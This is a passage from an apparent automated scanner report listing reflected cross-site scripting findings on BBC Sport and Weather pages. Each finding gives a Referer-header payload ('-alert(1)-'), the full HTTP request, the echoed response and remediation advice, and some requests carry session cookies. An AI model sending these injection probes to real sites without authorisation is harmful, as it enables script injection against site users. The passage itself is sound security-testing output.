Set-Cookie: BBC-UID=549de00a762a41cf7e1eca62115baf2b80dfb433b060a1a92bab930f338543120Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:59 GMT; path=/; domain=bbc.co.uk;
Content-Length: 117261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528159000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=72c5f'-alert(1)-'73e98f3b849',
       section: null,
       sectionPath: '/football',
       siteName: null,
       siteToServe: 'sport',
       siteVersion: '4',
       storyId: '9295057',
       assetType: null,
       uri: '/sport2/hi/football/9295057.stm',
...[SNIP]...

2.104. http://news.bbc.co.uk/sport2/hi/boxing/9293972.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/boxing/9293972.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aeb7d'-alert(1)-'10e6c900687 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/boxing/9293972.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=aeb7d'-alert(1)-'10e6c900687

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:40 GMT
Keep-Alive: timeout=10, max=747
Expires: Thu, 16 Dec 2010 19:35:40 GMT
Connection: close
Set-Cookie: BBC-UID=f40d20aaf68a304cde2eedc9310f30465ce35a6aa0a091691b1b330e30ee346c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:40 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=f40d20aaf68a304cde2eedc9310f30465ce35a6aa0a091691b1b330e30ee346c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:40 GMT; path=/; domain=bbc.co.uk;
Content-Length: 50980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528140000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=aeb7d'-alert(1)-'10e6c900687',
       section: null,
       sectionPath: '/boxing',
       siteName: null,
       siteToServe: 'sport',
       siteVersion: '4',
       storyId: '9293972',
       assetType: null,
       uri: '/sport2/hi/boxing/9293972.stm',
       c
...[SNIP]...

2.105. http://news.bbc.co.uk/sport2/hi/cricket/9287509.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/cricket/9287509.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5a5b'-alert(1)-'a337344086e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/cricket/9287509.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=b5a5b'-alert(1)-'a337344086e

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:40 GMT
Keep-Alive: timeout=10, max=736
Expires: Thu, 16 Dec 2010 19:35:40 GMT
Connection: close
Set-Cookie: BBC-UID=346d206ab6aad01c0d00ef55b1be4d413b0e81f080800233b7fd1a9025630aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:40 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=346d206ab6aad01c0d00ef55b1be4d413b0e81f080800233b7fd1a9025630aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:40 GMT; path=/; domain=bbc.co.uk;
Content-Length: 49962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528140000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=b5a5b'-alert(1)-'a337344086e',
       section: null,
       sectionPath: '/cricket',
       siteName: null,
       siteToServe: 'sport',
       siteVersion: '4',
       storyId: '9287509',
       assetType: null,
       uri: '/sport2/hi/cricket/9287509.stm',
   
...[SNIP]...

2.106. http://news.bbc.co.uk/sport2/hi/cricket/other_international/australia/9294389.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/cricket/other_international/australia/9294389.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c540'-alert(1)-'d3ce59c90f6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/cricket/other_international/australia/9294389.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6c540'-alert(1)-'d3ce59c90f6

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:44 GMT
Keep-Alive: timeout=10, max=797
Expires: Thu, 16 Dec 2010 19:35:44 GMT
Connection: close
Set-Cookie: BBC-UID=44fd606af67ad1d02db1804f81ffd8e5c1bd981250503243973d2ad0e5338aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:44 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=44fd606af67ad1d02db1804f81ffd8e5c1bd981250503243973d2ad0e5338aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:44 GMT; path=/; domain=bbc.co.uk;
Content-Length: 59510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528144000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=6c540'-alert(1)-'d3ce59c90f6',
       section: null,
       sectionPath: '/cricket/other_international/australia',
       siteName: null,
       siteToServe: 'sport',
       siteVersion: '4',
       storyId: '9294389',
       assetType: null,
       uri: '/spor
...[SNIP]...

2.107. http://news.bbc.co.uk/sport2/hi/football/europe/9293627.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/europe/9293627.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f859e'-alert(1)-'921a352e842 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/football/europe/9293627.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f859e'-alert(1)-'921a352e842

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:43 GMT
Keep-Alive: timeout=10, max=769
Expires: Thu, 16 Dec 2010 19:35:43 GMT
Connection: close
Set-Cookie: BBC-UID=342db0aa166aa0bf9d4bc2c0415e1068a028e683704051196b1b73f441e4eaae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=342db0aa166aa0bf9d4bc2c0415e1068a028e683704051196b1b73f441e4eaae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528143000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=f859e'-alert(1)-'921a352e842',
       section: null,
       sectionPath: '/football/europe',
       siteName: null,
       siteToServe: 'sport',
       siteVersion: '4',
       storyId: '9293627',
       assetType: null,
       uri: '/sport2/hi/football/europe/
...[SNIP]...

2.108. http://news.bbc.co.uk/sport2/hi/football/teams/c/chelsea/9295171.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/teams/c/chelsea/9295171.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24e7c'-alert(1)-'43c902f2cb2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/football/teams/c/chelsea/9295171.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=24e7c'-alert(1)-'43c902f2cb2

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:44 GMT
Keep-Alive: timeout=10, max=779
Expires: Thu, 16 Dec 2010 19:35:44 GMT
Connection: close
Set-Cookie: BBC-UID=34ddd08ae6cae1404066c635f163d97654415717c000315a045baa74106c66120Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:44 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=34ddd08ae6cae1404066c635f163d97654415717c000315a045baa74106c66120Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:44 GMT; path=/; domain=bbc.co.uk;
Content-Length: 53553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528144000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=24e7c'-alert(1)-'43c902f2cb2',
       section: null,
       sectionPath: '/football/teams/c/chelsea',
       siteName: null,
       siteToServe: 'sport',
       siteVersion: '4',
       storyId: '9295171',
       assetType: null,
       uri: '/sport2/hi/footbal
...[SNIP]...

2.109. http://news.bbc.co.uk/sport2/hi/football/teams/m/motherwell/9294234.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/teams/m/motherwell/9294234.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac0c3'-alert(1)-'c09a690db0f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/football/teams/m/motherwell/9294234.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ac0c3'-alert(1)-'c09a690db0f

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:46 GMT
Keep-Alive: timeout=10, max=791
Expires: Thu, 16 Dec 2010 19:35:46 GMT
Connection: close
Set-Cookie: BBC-UID=d4ed60da26ca21c25efa928451483826eda3243a90408189eb7b632e0e5bac6e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:46 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=d4ed60da26ca21c25efa928451483826eda3243a90408189eb7b632e0e5bac6e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:46 GMT; path=/; domain=bbc.co.uk;
Content-Length: 52899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528146000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=ac0c3'-alert(1)-'c09a690db0f',
       section: null,
       sectionPath: '/football/teams/m/motherwell',
       siteName: null,
       siteToServe: 'sport',
       siteVersion: '4',
       storyId: '9294234',
       assetType: null,
       uri: '/sport2/hi/foot
...[SNIP]...

2.110. http://news.bbc.co.uk/sport2/hi/golf/9294562.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/golf/9294562.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 842d4'-alert(1)-'8272e1a8e9a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/golf/9294562.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=842d4'-alert(1)-'8272e1a8e9a

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:45 GMT
Keep-Alive: timeout=10, max=741
Expires: Thu, 16 Dec 2010 19:35:45 GMT
Connection: close
Set-Cookie: BBC-UID=04ad30caf6ba01e16b74ac54b1d18d8fb3eb596ef080c19a74abfa6584616c0c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:45 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=04ad30caf6ba01e16b74ac54b1d18d8fb3eb596ef080c19a74abfa6584616c0c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:45 GMT; path=/; domain=bbc.co.uk;
Content-Length: 49960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528145000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=842d4'-alert(1)-'8272e1a8e9a',
       section: null,
       sectionPath: '/golf',
       siteName: null,
       siteToServe: 'sport',
       siteVersion: '4',
       storyId: '9294562',
       assetType: null,
       uri: '/sport2/hi/golf/9294562.stm',
       count
...[SNIP]...

2.111. http://news.bbc.co.uk/weather/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /weather/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29d24'-alert(1)-'eeaaca78394 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/ HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=29d24'-alert(1)-'eeaaca78394

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:25:54 GMT
Keep-Alive: timeout=10, max=500
Connection: close
Set-Cookie: BBC-UID=944d103ac6aa202a7d5b7091817cc58ff0ef9fe61050f1590b9b13b4b174bace0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:38 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=944d103ac6aa202a7d5b7091817cc58ff0ef9fe61050f1590b9b13b4b174bace0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:38 GMT; path=/; domain=bbc.co.uk;
X-Powered-By: PHP/5.2.5
X-Cache-Info: cached
Age: 584
Content-Length: 38424


               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528138000,
       editionToServe: null,
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=29d24'-alert(1)-'eeaaca78394',
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/',
       country: 'us',
       masthead: f
...[SNIP]...

2.112. http://news.bbc.co.uk/weather/forecast/2098/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/2098/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4bab'-alert(1)-'c40a4c281e3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/2098/ HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10042|J08781_10139|J08781_10216|J08781_10277; BBC-UID=048de0da76396d645de62f03e16c7e10505ea811e050412f32a9f0fcf600f7a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; BBCWCW=*********************8*London*0***********1*v54_3; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=f4bab'-alert(1)-'c40a4c281e3

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Date: Thu, 16 Dec 2010 19:52:04 GMT
Keep-Alive: timeout=10, max=800
Connection: close
X-Powered-By: PHP/5.2.5
Age: 30
Content-Length: 59868


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292529154000,
       editionToServe: null,
       queryString: 'loc=2098',
       referrer: 'http://www.google.com/search?hl=en&amp;q=f4bab'-alert(1)-'c40a4c281e3',
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/2098/',
       country: 'us',
...[SNIP]...

2.113. http://news.bbc.co.uk/weather/forecast/2302/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/2302/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99ec1'-alert(1)-'97d6f97d574 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/2302/ HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10042|J08781_10139|J08781_10216|J08781_10277; BBC-UID=048de0da76396d645de62f03e16c7e10505ea811e050412f32a9f0fcf600f7a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; BBCWCW=*********************8*London*0***********1*v54_3; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=99ec1'-alert(1)-'97d6f97d574

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:52:01 GMT
Keep-Alive: timeout=10, max=748
Connection: close
X-Powered-By: PHP/5.2.5
Content-Length: 59325


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292529152000,
       editionToServe: null,
       queryString: 'loc=2302',
       referrer: 'http://www.google.com/search?hl=en&amp;q=99ec1'-alert(1)-'97d6f97d574',
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/2302/',
       country: 'us',
...[SNIP]...

2.114. http://news.bbc.co.uk/weather/forecast/2389/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/2389/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce60c'-alert(1)-'daeaea85a76 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/2389/ HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
